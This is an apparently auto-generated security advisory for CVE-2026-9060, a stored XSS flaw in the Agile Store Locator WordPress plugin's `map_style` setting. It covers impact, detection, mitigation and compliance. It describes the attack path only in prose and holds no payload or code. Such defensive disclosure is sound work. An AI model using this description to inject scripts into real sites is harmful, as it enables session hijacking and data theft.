Stored XSS in Store Locator WordPress Plugin

Executive Summary

The CVE-2026-9060 vulnerability affects the Agile Store Locator WordPress plugin versions prior to 1.6.6. It is a Stored Cross-Site Scripting (XSS) issue that allows high-privileged users, such as administrators, to inject malicious scripts via the `map_style` setting.

The plugin fails to properly sanitize and escape user input before storing it and displaying it on the admin page, enabling attackers to execute arbitrary JavaScript when an administrator views the page.

This vulnerability persists even when the `unfiltered_html` capability is restricted, such as in multisite networks where a super admin without this capability visits the affected page.

An attacker can exploit this by sending a crafted AJAX request to inject an XSS payload into the `map_style` parameter, which is then executed when the admin page is accessed.

Useful 0 Not Useful 0

Impact Analysis

This vulnerability allows high-privileged users to perform Stored Cross-Site Scripting attacks, which can lead to the execution of arbitrary JavaScript code within the admin interface.

Such attacks can be used to hijack administrator sessions, steal sensitive information, manipulate site settings, or perform other malicious actions with administrator privileges.

Because the vulnerability affects the admin page, it can compromise the security and integrity of the WordPress site, especially in multisite networks where super admins are affected even without the `unfiltered_html` capability.

Useful 0 Not Useful 0

Detection Guidance

This vulnerability can be detected by checking if the Agile Store Locator WordPress plugin version is prior to 1.6.6, as those versions are affected.

Additionally, detection can involve inspecting the `map_style` setting for suspicious or malicious JavaScript code injections.

A practical approach is to review the plugin's stored settings or database entries related to `map_style` for unexpected script tags or payloads.

Since the vulnerability can be exploited via crafted AJAX requests, monitoring HTTP requests to the plugin's AJAX endpoints for unusual or suspicious payloads targeting `map_style` may help detect exploitation attempts.

Specific commands are not provided in the available resources.

Useful 0 Not Useful 0

Mitigation Strategies

The immediate mitigation step is to update the Agile Store Locator WordPress plugin to version 1.6.6 or later, where the vulnerability has been fixed.

Until the update can be applied, restrict access to the Store Locator plugin's admin pages to trusted users only, to reduce the risk of exploitation.

Also, consider reviewing and sanitizing the `map_style` setting manually to remove any injected scripts.

Useful 0 Not Useful 0

Compliance Impact

The vulnerability allows high-privileged users to perform Stored Cross-Site Scripting (XSS) attacks by injecting malicious scripts into the plugin's settings, which are then executed on the admin page.

Such XSS vulnerabilities can lead to unauthorized access to sensitive information or administrative functions, potentially compromising data confidentiality and integrity.

This could impact compliance with standards and regulations like GDPR and HIPAA, which require protection of personal data and secure handling of administrative access.

However, the vulnerability requires high-privileged user access to exploit, which may limit the scope of impact depending on the environment's user management and security controls.

Useful 0 Not Useful 0